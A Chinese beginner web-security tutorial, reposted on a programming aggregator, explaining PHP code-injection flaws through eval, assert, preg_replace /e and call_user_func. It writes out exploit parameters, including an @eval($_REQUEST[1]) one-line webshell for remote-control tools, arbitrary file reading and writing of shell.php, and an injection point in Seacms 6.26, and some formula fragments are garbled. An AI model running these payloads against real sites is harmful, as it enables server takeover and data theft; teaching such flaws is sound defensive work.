我的编程空间,编程开发者的网络收藏夹
学习永远不晚

代码注入(web安全入门)

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

代码注入(web安全入门)

一、原理以及成因

php 代码执行(注入)是指应用程序过滤不严,用户可以 http 通过请求将代码注入到应用中执行。
代码执行(注入)类似于 SQL 注入漏洞,SQLi 是将 SQL 语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个 Web 后门的存在。
1、程序中含有可以执行 PHP 代码的函数或者语言结构
2、传入第一点中的参数,客户端可控,直接修改或者影响

二、漏洞危害

Web 应用如果存在代码执行漏洞是一件非常可怕的事情,就像一个人没有穿衣服,赤裸裸的暴露在光天化日之下。可以通过代码执行漏洞继承 Web 用户权限,执行任意代码。如果服务器没有正确的配置,Web 用户权限比较高的话,我们可以读写目标服务器任意文件内容,甚至可控制整个网站以及服务器。
本课程以 PHP 为例子来说明,代码执行漏洞。
PHP 中有很多函数和语句都会造成 PHP 代码执行漏洞。

三、相关函数和语句

3.1 eval()

eval() 会将字符串当作 PHP 代码来执行。测试代码如下

?code=phpinfo();"}
?code=phpinfo();"}

提交变量[?code=phpinfo();] 我们提交以下参数也是可以的[?code=${phpinfo()};]
[?code=1;phpinfo();] //可以执行多条语句

2 assert()
assert() 同样会作为 PHP 代码执行测试代码如下

?code=phpinfo();"}

提交参数 [?code=phpinfo()]

3.3 preg_replace()

preg_replace() 函数作用是对字符串进行正则处理,参数和返回值如下
mixed preg_replace(mixed $pattern,mixed $replacement,mixed KaTeX parse error: Expected 'EOF', got '&' at position 30: …imit = -1[,int &̲count]])
这段代码的含义是搜索 s u b j e c t 中匹配 subject 中匹配 subject中匹配pattern 的部分,以$replacement 进行替换,而
p a t t e r n 处,及第一个参数存在 e 修饰时, pattern 处,及第一个参数存在 e 修饰时, pattern处,及第一个参数存在e修饰时,replacement 的值会被当成 PHP 代码来执行。典型的代码如下

?code=phpinfo();"}

提交参数[?code=[phpinfo()]], phpinfo() 会被执行

3.4 call_user_func()

call_user_func() 等函数都有调用其他函数的功能,其中一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用以外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。
以 call_user_func() 为例子,该函数的第一个参数作为回调函数,测试代码如下

提交参数[?fun=assert¶=phpinfo()]
注意:这里不能使用 eval,因为 eval 是语言结构,不是函数。

5 动态函数 a ( a( a(b)
由于 PHP 的特性原因,PHP 的函数支持直接由拼接的方式调用,这导致 PHP 再安全上的控制又加大了难度。不少知名程序也用到了动态函数的写法,这种写法跟使用 call_user_func() 的初衷一样,用来更加方便的调用函数,但是一旦过滤不严格就会造成代码执行漏洞。
测试代码如下:

四、漏洞利用

代码执行漏洞的利用方式有很多中

4.1 直接获取shell

提交参数[?code=@eval($_REQUEST[1])],即可构成一句话木马,密码为 1。可以使用菜刀或者蚁剑连接

4.2 获取当前文件的绝对路径

FILE 是 PHP 预定义常量,其含义为当前文件的路径。提交代码[?code=print(FILE);]

3 读文件
我们可以利用 file_get_contents() 函数读取服务器任意文件,前提是知道文件的绝对路径(也可是相对路径)和读取权限。

提交代码[?code=var_dump(file_get_contents(‘c:\windows\system32\drivers\etc\hosts’));] 右键查看源代码

4.4 写文件

我们可以利用 file_put_contents() 函数写入文件,前提是知道可写文件目录。提交代码[?code=var_dump(file_put_contents( P O S T [ 1 ] , _POST[1], POST[1],_POST[2]));]
此时需要借助与 hackbar 通过 post 方式提交参数
[1=shel.php&2=]
即可再当前目录下创建一个文件 shell.php

五、防御方法

尽量不要使用 eval(不是函数,是语言结构) 等函数
2、如果使用的话一定要进行严格的过滤3、preg_replace 放弃使用/e 修饰符
4、修改配置文件 php.ini disable_functions=assert

实战:
海洋 Seacmsv6.26 系统存在代码注入漏洞
漏洞点[/search.php?searchtype=5&tid=&area=phpinfo()]
6.53 6.54 6.55 都存在代码注入漏洞

来源地址:https://blog.csdn.net/qq_32277727/article/details/128378045

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

代码注入(web安全入门)

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

WEB安全入门:如何防止 CSRF 攻击?

现在,我们绝大多数人都会在网上购物买东西。但是很多人都不清楚的是,很多电商网站会存在安全漏洞。乌云就通报过,国内很多家公司的网站都存在 CSRF 漏洞。如果某个网站存在这种安全漏洞的话,那么我们在购物的过程中,就很可能会被网络黑客盗刷信用卡。是不是瞬间有点「不
WEB安全入门:如何防止 CSRF 攻击?
2018-07-02

Java注解入门案例代码分析

这篇文章主要介绍“Java注解入门案例代码分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Java注解入门案例代码分析”文章能帮助大家解决问题。Talk is cheap, show me the
2023-07-05

web安全之机器学习入门——3.2 决策

目录简介决策树简单用法决策树检测P0P3爆破决策树检测FTP爆破随机森林检测FTP爆破 简介决策树和随机森林算法是最常见的分类算法;决策树,判断的逻辑很多时候和人的思维非常接近。随机森林算法,利用多棵决策树对样本进行训练并预测的一种分类器,
2023-01-31

PHP 代码安全:针对 SQL 注入的防范措施

为了防止 php 中的 sql 注入漏洞,可以采取以下措施:使用参数化查询,将用户输入与 sql 语句分开处理。转义用户输入,防止特殊字符被解释为查询的一部分。使用白名单验证,仅允许预定义的输入值。使用输入验证库,自动执行转义和白名单验证等
PHP 代码安全:针对 SQL 注入的防范措施
2024-05-10

python必背入门代码

Python是一种简单易学的编程语言,适合初学者入门。下面是一些必备的Python入门代码,帮助你快速上手编程:1、输出Hello Worldprint("Hello World!")2、变量和数据类型# 定义变量并赋值name = "A
2023-10-25

Java安全编码SQL该怎样注入

Java安全编码SQL该怎样注入,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。随着互联网的发展,Java语言在金融服务业、电子商务、大数据技术等方面的应用极其广泛。Java
2023-06-17

【HTML颜色代码大全:从入门到精通】

HTML颜色代码是用于指定网页元素颜色的代码,本文将介绍HTML颜色代码的基础知识,以及如何使用HTML颜色代码来美化网页。
【HTML颜色代码大全:从入门到精通】
2024-02-14

Web网络安全分析Base64注入攻击原理

这篇文章主要讲解了“Web网络安全分析Base64注入攻击原理”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“Web网络安全分析Base64注入攻击原理”吧!Base64注入攻击Base64攻
2023-06-25

ASP Web 安全性:如何防止SQL注入攻击

了解SQL注入攻击如何危及ASP Web应用程序至关重要。通过使用参数化查询并验证用户输入,可以有效防止此类攻击,确保应用程序数据的安全和完整性。
ASP Web 安全性:如何防止SQL注入攻击
2024-02-13

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录